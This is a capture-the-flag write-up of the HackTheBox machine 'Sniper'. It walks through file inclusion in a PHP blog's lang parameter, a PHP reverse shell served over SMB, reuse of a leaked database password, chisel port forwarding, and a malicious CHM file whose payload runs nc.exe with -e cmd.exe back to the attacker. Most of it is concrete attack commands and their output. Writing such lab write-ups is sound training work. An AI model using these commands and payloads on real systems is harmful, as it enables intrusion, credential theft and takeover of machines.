Sniper-htb-writeup

0x00 Skills covered

Skills in this chapter: arbitrary file read and file inclusion, php_reverse_shell.php, MySQL configuration leak, password reuse, port forwarding, chisel.exe, crafting a malicious CHM file for privilege escalation

Reference: https://z10x64.github.io/posts/sniper-write-up---hackthebox/

0x01 Getting user

1. Machine overview

Sniper is a medium-difficulty Windows machine running a PHP server. The server hosts a file that is found to be vulnerable to local and remote file inclusion. Command execution on the server in the context of NT AUTHORITY\iUSR is obtained by locally including a maliciously crafted PHP session file. Exposed database credentials are used to gain access as the user Chris, who has the same password. Enumeration reveals that the administrator is reviewing CHM (Compiled HTML Help) files, which can be leveraged to leak the administrator's NetNTLMv2 hash. This can be captured, cracked, and used with a PowerShell credential object to obtain a reverse shell as administrator. (This write-up takes the remote-inclusion route over SMB instead of session files, so the first shell lands as iis apppool\defaultapppool.)

2. Target IP address: 10.10.10.151

3. Open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,135,139,445,49667 -sC -sV --min-rate=5000 10.10.10.151
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 00:15 CST
Nmap scan report for 10.10.10.151
Host is up (0.47s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
49667/tcp open tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-05-27T15:25:56
|_ start_date: N/A
|_clock-skew: -51m40s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.56 seconds

4. Browse the default site on port 80

http://10.10.10.151/

http://10.10.10.151/user/login.php

http://10.10.10.151/blog/index.php

5. Enumerating the blog shows that the lang parameter of /blog/ is fed straight into a file include: passing a Windows path returns that file's contents inside the page. Below, C:\Windows\System32\drivers\etc\hosts is read, which confirms arbitrary file read (local file inclusion):

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -s -X GET 'http://10.10.10.151/blog/?lang=\Windows\System32\drivers\etc\hosts'
<html>
<body>
<!DOCTYPE html>
<html lang="en" >
..............

</body>

</html>
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
</body>
</html>

6. Next, test whether the include also works remotely, using the open-source php_reverse_shell.php below. Edit the IP address and port in the PHP file to point at the attacker listener (10.10.14.45:443 here) before serving it.

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php

7. Serve the file from an SMB share and include it through a UNC path. PHP on Windows treats \\host\share\file as an ordinary filesystem path, so include() fetches the script from the attacker's share regardless of the allow_url_include setting; the impacket-smbserver log shows the IIS worker connecting anonymously (SNIPER\) to read it:

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-smbserver share . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.151,49678)
[*] AUTHENTICATE_MESSAGE (\,SNIPER)
[*] User SNIPER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:SHARE)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:SHARE)
[*] Closing down connection (10.10.10.151,49678)
[*] Remaining connections []

┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -s -X GET 'http://10.10.10.151/blog/?lang=\\10.10.14.45\share\php_reverse_shell.php'

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.151] 49718
SOCKET: Shell has connected! PID: 340
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\blog>whoami
iis apppool\defaultapppool

C:\inetpub\wwwroot\blog>

8. From the shell (running as iis apppool\defaultapppool), enumerating the web root turns up user\db.php with the MySQL credentials in cleartext:

C:\inetpub\wwwroot>dir
Volume in drive C has no label.
Volume Serial Number is AE98-73A8

Directory of C:\inetpub\wwwroot

04/11/2019 10:51 AM <DIR> .
04/11/2019 10:51 AM <DIR> ..
04/11/2019 05:23 AM <DIR> blog
04/11/2019 05:23 AM <DIR> css
04/11/2019 05:23 AM <DIR> images
04/11/2019 05:22 PM 2,635 index.php
04/11/2019 05:23 AM <DIR> js
04/11/2019 05:23 AM <DIR> scss
10/01/2019 08:44 AM <DIR> user
1 File(s) 2,635 bytes
8 Dir(s) 2,420,936,704 bytes free

C:\inetpub\wwwroot>cd user

C:\inetpub\wwwroot\user>dir
Volume in drive C has no label.
Volume Serial Number is AE98-73A8

Directory of C:\inetpub\wwwroot\user

10/01/2019 08:44 AM <DIR> .
10/01/2019 08:44 AM <DIR> ..
04/11/2019 05:15 PM 108 auth.php
04/11/2019 05:52 AM <DIR> css
04/11/2019 10:51 AM 337 db.php
04/11/2019 05:23 AM <DIR> fonts
04/11/2019 05:23 AM <DIR> images
04/11/2019 06:18 AM 4,639 index.php
04/11/2019 05:23 AM <DIR> js
04/11/2019 06:10 AM 6,463 login.php
04/08/2019 11:04 PM 148 logout.php
10/01/2019 08:42 AM 7,192 registration.php
08/14/2019 10:35 PM 7,004 registration_old123123123847.php
04/11/2019 05:23 AM <DIR> vendor
7 File(s) 25,891 bytes
7 Dir(s) 2,420,936,704 bytes free

C:\inetpub\wwwroot\user>type db.php
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>

C:\inetpub\wwwroot\user>

9. Now check which local users exist: C:\Users holds Administrator and Chris.

C:\inetpub\wwwroot\user>cd C:/

C:\>dir
Volume in drive C has no label.
Volume Serial Number is AE98-73A8

Directory of C:\

10/01/2019 01:04 PM <DIR> Docs
04/09/2019 07:07 AM <DIR> inetpub
04/11/2019 06:44 AM <DIR> Microsoft
09/15/2018 12:19 AM <DIR> PerfLogs
04/29/2022 01:18 PM <DIR> Program Files
08/14/2019 10:38 PM <DIR> Program Files (x86)
04/11/2019 07:04 AM <DIR> Users
04/29/2022 01:19 PM <DIR> Windows
0 File(s) 0 bytes
8 Dir(s) 2,420,936,704 bytes free

C:\>cd Users

C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is AE98-73A8

Directory of C:\Users

04/11/2019 07:04 AM <DIR> .
04/11/2019 07:04 AM <DIR> ..
04/09/2019 06:47 AM <DIR> Administrator
04/11/2019 07:04 AM <DIR> Chris
04/09/2019 06:47 AM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 2,420,936,704 bytes free

C:\Users>

10. Check whether the database password is reused for Chris's Windows account (SMB logon test with crackmapexec):

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.151 -u Chris -p '36mEAhz/B8xQ~2VM'
SMB 10.10.10.151 445 SNIPER [*] Windows 10.0 Build 17763 x64 (name:SNIPER) (domain:Sniper) (signing:False) (SMBv1:False)
SMB 10.10.10.151 445 SNIPER [+] Sniper\Chris:36mEAhz/B8xQ~2VM

11. The credentials are valid, so keep enumerating from the IIS shell. Chris is a member of Remote Management Users, and WinRM is listening on 5985, a port that was not reachable from outside in the scan:

C:\Users>net user Chris
User name Chris
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 4/11/2019 6:53:37 AM
Password expires Never
Password changeable 4/11/2019 6:53:37 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/27/2024 9:22:41 AM

Logon hours allowed All

Local Group Memberships *Remote Management Use*Users
Global Group memberships *None
The command completed successfully.


C:\Users>netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 872
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 6568
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:33060 0.0.0.0:0 LISTENING 6568
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 480
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1160
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1556
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2544
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 612
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 628
TCP 10.10.10.151:80 10.10.14.45:48424 ESTABLISHED 4
TCP 10.10.10.151:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.151:49718 10.10.14.45:443 ESTABLISHED 2228
TCP 127.0.0.1:49672 127.0.0.1:49673 ESTABLISHED 6568
TCP 127.0.0.1:49673 127.0.0.1:49672 ESTABLISHED 6568
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 872
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:3306 [::]:0 LISTENING 6568
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:33060 [::]:0 LISTENING 6568
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 480
TCP [::]:49665 [::]:0 LISTENING 1160
TCP [::]:49666 [::]:0 LISTENING 1556
TCP [::]:49667 [::]:0 LISTENING 2544
TCP [::]:49668 [::]:0 LISTENING 612
TCP [::]:49669 [::]:0 LISTENING 628
UDP 0.0.0.0:123 *:* 2808
UDP 0.0.0.0:500 *:* 2632
UDP 0.0.0.0:4500 *:* 2632
UDP 0.0.0.0:5353 *:* 1588
UDP 0.0.0.0:5355 *:* 1588
UDP 10.10.10.151:137 *:* 4
UDP 10.10.10.151:138 *:* 4
UDP 127.0.0.1:63095 *:* 3092
UDP [::]:123 *:* 2808
UDP [::]:500 *:* 2632
UDP [::]:4500 *:* 2632
UDP [::]:5353 *:* 1588
UDP [::]:5355 *:* 1588



C:\Users>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::140
IPv6 Address. . . . . . . . . . . : dead:beef::4888:348:9d63:75c
Link-local IPv6 Address . . . . . : fe80::4888:348:9d63:75c%14
IPv4 Address. . . . . . . . . . . : 10.10.10.151
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:9106%14
10.10.10.2

C:\Users>

12. Port 5985 has to be forwarded out so we can log in over WinRM. Download the chisel Windows binary (c.exe, served from an HTTP server on the attacker host) into C:\temp and start it as a client. The argument R:5985:127.0.0.1:5985 asks the chisel server to open port 5985 on the attacker side and relay it to the target's loopback 5985:

C:\temp>dir
Volume in drive C has no label.
Volume Serial Number is AE98-73A8

Directory of C:\temp

05/27/2024 01:35 PM <DIR> .
05/27/2024 01:35 PM <DIR> ..
05/27/2024 01:09 PM <DIR> Microsoft
0 File(s) 0 bytes
3 Dir(s) 2,408,816,640 bytes free

C:\temp>powershell iwr -uri http://10.10.14.45/c.exe -Outfile c.exe

C:\temp>dir
Volume in drive C has no label.
Volume Serial Number is AE98-73A8

Directory of C:\temp

05/27/2024 01:35 PM <DIR> .
05/27/2024 01:35 PM <DIR> ..
05/27/2024 01:39 PM 9,006,080 c.exe
05/27/2024 01:09 PM <DIR> Microsoft
1 File(s) 9,006,080 bytes
3 Dir(s) 2,399,809,536 bytes free

C:\temp>c.exe client 10.10.14.45:9002 R:5985:127.0.0.1:5985
2024/05/27 13:41:18 client: Connecting to ws://10.10.14.45:9002
2024/05/27 13:41:18 client: Connected (Latency 115.9075ms)

13. The server side (chisel in reverse mode on port 9002) logs the target's connection and binds the reverse proxy:

┌──(kali㉿offsec)-[~/Desktop/tools/chisel]
└─$ ./chisel_1.9.1_linux_arm64 server -p 9002 -reverse -v
2024/05/28 05:38:49 server: Reverse tunnelling enabled
2024/05/28 05:38:49 server: Fingerprint Y+9hbCxIM37vG5hkg9SSAAZrj8E13nB/gQd8zktrGgg=
2024/05/28 05:38:49 server: Listening on http://0.0.0.0:9002
2024/05/28 05:43:08 server: session#1: Handshaking with 10.10.10.151:49740...
2024/05/28 05:43:08 server: session#1: Verifying configuration
2024/05/28 05:43:09 server: session#1: tun: Created
2024/05/28 05:43:09 server: session#1: tun: proxy#R:5985=>5985: Listening
2024/05/28 05:43:09 server: session#1: tun: Bound proxies
2024/05/28 05:43:09 server: session#1: tun: SSH connected

14. Log in with evil-winrm through the tunnel (127.0.0.1:5985) as Chris and collect the first flag:

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 127.0.0.1 -u Chris -p '36mEAhz/B8xQ~2VM'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chris\Documents> whoami
sniper\chris
*Evil-WinRM* PS C:\Users\Chris\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Chris\Desktop> dir


Directory: C:\Users\Chris\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/27/2024 8:08 AM 34 user.txt


*Evil-WinRM* PS C:\Users\Chris\Desktop> cat user.txt
47e48f4889a7da718862c1195fd4d3a3
*Evil-WinRM* PS C:\Users\Chris\Desktop>

0x02 Getting system (Administrator) privileges

15. Continue enumerating:

*Evil-WinRM* PS C:\Users\Chris\Desktop> cd C:/
*Evil-WinRM* PS C:\> dir


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/1/2019 1:04 PM Docs
d----- 4/9/2019 7:07 AM inetpub
d----- 4/11/2019 6:44 AM Microsoft
d----- 9/15/2018 12:19 AM PerfLogs
d-r--- 4/29/2022 1:18 PM Program Files
d----- 8/14/2019 10:38 PM Program Files (x86)
d----- 5/27/2024 1:35 PM temp
d-r--- 4/11/2019 7:04 AM Users
d----- 4/29/2022 1:19 PM Windows


*Evil-WinRM* PS C:\> cd Docs
*Evil-WinRM* PS C:\Docs> dir


Directory: C:\Docs


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 9:31 AM 285 note.txt
-a---- 4/11/2019 9:17 AM 552607 php for dummies-trial.pdf


*Evil-WinRM* PS C:\Docs> cat note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.
*Evil-WinRM* PS C:\Docs> download "php for dummies-trial.pdf"

Info: Downloading C:\Docs\dummies-trial.pdf to dummies-trial.pdf

Error: Download failed. Check filenames or paths
*Evil-WinRM* PS C:\Docs>

16. Enumeration turns up a note in C:\Docs. Read together with the hint in it, the administrator expects documentation to be dropped into that directory. (The PDF download failed only because evil-winrm split the file name on its spaces and looked for dummies-trial.pdf.)

A CHM (Compiled HTML Help) file contains help documentation in compiled form. CHM files are associated with Microsoft HTML Help, the proprietary online help format introduced with Windows 98.

17. Chris's Downloads folder also holds a .chm file (instructions.chm), which matches the idea that CHM files are what gets opened on this box:

*Evil-WinRM* PS C:\Docs> dir C:/Users/Chris/downloads


Directory: C:\Users\Chris\downloads


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 8:36 AM 10462 instructions.chm


*Evil-WinRM* PS C:\Docs> download C:/Users/Chris/downloads

Info: Downloading C:/Users/Chris/downloads to downloads

Info: Download successful!
*Evil-WinRM* PS C:\Docs>

18. So there should be a way to craft a malicious .chm that runs a payload when the administrator opens it.

19. The nishang script Out-CHM.ps1 (https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1) generates a .chm that runs PowerShell commands or scripts. It needs hhc.exe from Microsoft HTML Help Workshop (the -HHCPath argument), which is not installed on the target, so running it there fails as shown below; the file is meant to be built on a Windows host that has the Workshop installed and then dropped into C:\Docs.

*Evil-WinRM* PS C:\Docs> upload /home/kali/Desktop/Out-CHM.ps1

Info: Uploading /home/kali/Desktop/Out-CHM.ps1 to C:\Docs\Out-CHM.ps1

Data: 26000 bytes of 26000 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Docs> dir


Directory: C:\Docs


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 9:31 AM 285 note.txt
-a---- 5/27/2024 1:47 PM 19502 Out-CHM.ps1
-a---- 4/11/2019 9:17 AM 552607 php for dummies-trial.pdf


*Evil-WinRM* PS C:\Docs> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Docs>
*Evil-WinRM* PS C:\Docs> Import-Module ./Out-CHM.ps1
*Evil-WinRM* PS C:\Docs> Out-CHM -Payload "\\10.10.14.45\share\nc.exe 10.10.14.45 53 -e cmd.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
The term 'C:\Program Files (x86)\HTML Help Workshop\hhc.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At C:\Docs\Out-CHM.ps1:316 char:7
+ & "$HHC" "$OutputPath\doc.hhp"
+ ~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Program File...orkshop\hhc.exe:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Docs>

20. Because of the environment problem I could not be bothered to generate it again and just followed the walkthrough.

21. Crack the captured hash. When the administrator opens the CHM, the payload's UNC path (\\10.10.14.45\share\...) makes the administrator's session authenticate to the attacker's SMB server, which logs the NetNTLMv2 challenge-response; saved in john's netntlmv2 format it cracks against rockyou in seconds:

❯ john -w:/usr/share/seclists/rockyou.txt hash
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
butterfly!#1 (Administrator)
1g 0:00:00:06 DONE (2024-01-01 22:26) 0.1620g/s 316659p/s 316659c/s 316659C/s byrd78..burlfire
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

22. With the cracked password, log in straight away as administrator with impacket-psexec (which needs write access to ADMIN$, i.e. local administrator rights) and read the final flag:

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec administrator@10.10.10.151
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.10.10.151.....
[*] Found writable share ADMIN$
[*] Uploading file CxHlLZHc.exe
[*] Opening SVCManager on 10.10.10.151.....
[*] Creating service Iqll on 10.10.10.151.....
[*] Starting service Iqll.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> cd C:/Users/administrator/Desktop

C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is AE98-73A8

Directory of C:\Users\Administrator\Desktop

03/22/2023 10:22 AM <DIR> .
03/22/2023 10:22 AM <DIR> ..
05/27/2024 08:08 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,398,326,784 bytes free

C:\Users\Administrator\Desktop> type root.txt
55f2bd84b8ecf828cca979ec066fe4ed

C:\Users\Administrator\Desktop>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/211


Sniper-htb-writeup: https://sh1yan.top/2024/05/28/Sniper-htb-writeup/
Author: shiyan
Published: 28 May 2024